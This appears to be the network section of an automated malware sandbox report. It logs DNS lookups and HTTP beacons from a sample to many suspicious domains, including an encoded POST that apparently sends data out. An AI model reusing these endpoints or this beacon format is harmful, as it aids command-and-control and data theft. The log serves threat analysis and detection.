                Source: global trafficHTTP traffic detected: GET /v3s3/?dpy4vDKP=tyn9Xf4Tiyk8OMwOE2/3W7I6SfC4Fy+XuF+V6x+u+aHyo7NExtCHdgYtt4f9rPCqzYPXesK+A0TEw6Z3hMmMu6en0oemB8DST7EgTGpjLeWNMzHlOHw+YKqeTj7VW+MXtw==&t8=erepa0aHg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.vpnto.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                Source: global trafficHTTP traffic detected: GET /vxa5/?t8=erepa0aHg&dpy4vDKP=3m9BMPCo28gPx+sVgKXwS8IlJOXqcXmGTC3iha7DeRIyHWQ2U5yIEoIaKrBYwlKWmJAMybrbkv8ugG4OPEpxsFgkF6ZwXtqNiPQ58hDKvZiQtRpFO+ljJVXyg6SqNh6RKQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.avalanchefi.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                Source: global trafficHTTP traffic detected: GET /pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME+5G/BY7+mMEXOiclzjhJwCZdUbRes612uS6KmZhj3zV5mWNPQZslZbRtI4SShrzI4pEvHSsV/RdVS1ssPCnJ48fYcpfjGOVa6yb/Zo31Sw==&t8=erepa0aHg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.amayavp.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                Source: global trafficHTTP traffic detected: GET /nlsy/?t8=erepa0aHg&dpy4vDKP=UqZJjljcaDHPU5MJF3/VZj5j3teXWnZaRQ/xhIwYknb6hebLg3nkkQRCQY+bdc+EMOTwSi3/zIBCbkzFO/JkBIXeM3N7PUFbamj23ddqQuGG3w5lM7wcBAQnAQO0NkBIlw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.beythome.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                Source: global trafficHTTP traffic detected: GET /e60d/?dpy4vDKP=Lh8IZlyEUGMyHNz6uzMKRKcg9kIQklaGIJ5xEwxQigTlOIYbC6hIWaFGebeUYVIRA2Z0HVQvNj5Y3e9+xtlK2GGMMiSOyWHkKpdyqmIJ1jPdVOmhO/2pbDJYfwa6foHFGQ==&t8=erepa0aHg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.d48dk.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                Source: global trafficDNS traffic detected: DNS query: www.bagatowcannabis.cloud
                Source: global trafficDNS traffic detected: DNS query: www.8600228.xyz
                Source: global trafficDNS traffic detected: DNS query: www.remedies.pro
                Source: global trafficDNS traffic detected: DNS query: www.officinadelpasso.shop
                Source: global trafficDNS traffic detected: DNS query: www.liveplah.live
                Source: global trafficDNS traffic detected: DNS query: www.appsolucao.shop
                Source: global trafficDNS traffic detected: DNS query: www.cg19g5.pro
                Source: global trafficDNS traffic detected: DNS query: www.kuyubak.online
                Source: global trafficDNS traffic detected: DNS query: www.acond-22-mvr.click
                Source: global trafficDNS traffic detected: DNS query: www.vpnto.net
                Source: global trafficDNS traffic detected: DNS query: www.avalanchefi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.amayavp.xyz
                Source: global trafficDNS traffic detected: DNS query: www.beythome.online
                Source: global trafficDNS traffic detected: DNS query: www.d48dk.top
                Source: global trafficDNS traffic detected: DNS query: www.fantastica.digital
                Source: unknownHTTP traffic detected: POST /1aqh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.8600228.xyzOrigin: http://www.8600228.xyzConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 209Cache-Control: max-age=0Referer: http://www.8600228.xyz/1aqh/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)Data Raw: 64 70 79 34 76 44 4b 50 3d 42 49 58 6c 46 55 49 56 66 38 35 69 58 2f 2f 50 30 58 67 54 61 34 34 6c 70 76 41 35 52 77 73 51 7a 6a 51 53 6b 4f 37 55 69 35 6e 31 36 48 4b 74 50 72 58 72 36 63 45 6d 44 66 75 59 35 42 45 76 2f 43 2f 6f 37 37 42 37 50 4e 74 45 64 72 35 47 44 78 61 65 72 55 57 4d 4d 66 6e 2f 7a 78 56 6a 69 70 45 63 70 4c 47 58 4d 42 67 31 73 78 6e 6c 45 4a 30 35 59 53 72 6c 71 4a 67 62 2f 6f 4c 49 44 72 50 51 68 6d 54 54 31 48 64 66 65 34 6e 54 42 4a 6b 61 50 56 59 34 44 64 33 38 63 66 71 7a 51 69 51 41 4e 42 69 38 46 6d 63 6d 76 37 68 54 34 38 65 6f 38 37 4c 44 4a 51 38 4c 70 46 30 58 79 42 74 37 53 6e 4d 3d Data Ascii: dpy4vDKP=BIXlFUIVf85iX//P0XgTa44lpvA5RwsQzjQSkO7Ui5n16HKtPrXr6cEmDfuY5BEv/C/o77B7PNtEdr5GDxaerUWMMfn/zxVjipEcpLGXMBg1sxnlEJ05YSrlqJgb/oLIDrPQhmTT1Hdfe4nTBJkaPVY4Dd38cfqzQiQANBi8Fmcmv7hT48eo87LDJQ8LpF0XyBt7SnM=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:43:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:43:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 31 34 38 0d 0a 3c 62 72 3e 0d 0a 3c 62 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 22 3e e5 8a a0 e8 bd bd e4 b8 ad ef bc 8c e8 af b7 e7 a8 8d e5 90 8e 2e 2e 2e 2e 2e 2e 3c 2f 70 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4a 58 4f 79 43 6d 38 6f 64 56 58 78 68 42 32 77 22 2c 63 6b 3a 22 4a 58 4f 79 43 6d 38 6f 64 56 58 78 68 42 32 77 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 66 79 65 72 2e 63 6f 6d 3f 69 64 3d 38 34 35 36 32 22 20 2f 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 148<br><br><center><p style="font-size: 20px;">......</p></center><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"JXOyCm8odVXxhB2w",ck:"JXOyCm8odVXxhB2w"})</script><meta http-equiv="refresh" content="1;url=https://www.bfyer.com?id=84562" />0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:15 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:18 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:20 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:23 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 05 Dec 2024 08:45:23 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-05T08:45:28.7410353Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 05 Dec 2024 08:46:39 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-05T08:46:44.2627996Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:46:46 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:46:49 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
